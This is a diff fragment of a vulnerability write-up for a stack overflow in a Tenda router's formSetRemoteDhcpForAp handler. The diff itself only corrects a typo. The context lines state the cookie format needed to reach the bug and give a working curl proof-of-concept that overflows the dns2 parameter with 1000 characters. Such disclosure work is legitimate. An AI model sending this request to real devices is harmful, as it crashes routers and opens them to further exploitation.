dwBruijn/CVEs/Tenda/setRemoteDhcpForAp.md

 ✅ 4. devUid format: devUid=IP:PORT;
 ✅ 5.
 IP must be valid dotted-quad format (xxx.xxx.xxx.xxx)

-Now we ca send a POST request to the `/goform/setDhcpAP` endpoint to trigger the stack overflow in `formSetRemoteDhcpForAp` and we can deliver the payload using any of the 6 parameters
+Now we can send a POST request to the `/goform/setDhcpAP` endpoint to trigger the stack overflow in `formSetRemoteDhcpForAp` and we can deliver the payload using any of the 6 parameters

 ```
 curl -X POST http://172.16.182.130/goform/setDhcpAP -H "Cookie: devUid=172.16.182.130:80;" -d "startip=192.168.10.100" -d "endip=192.168.10.200" -d "leasetime=604800" -d "gateway=192.168.10.1" -d "dns1=8.8.8.8" -d "dns2=$(python3 -c 'print("D"*1000)')"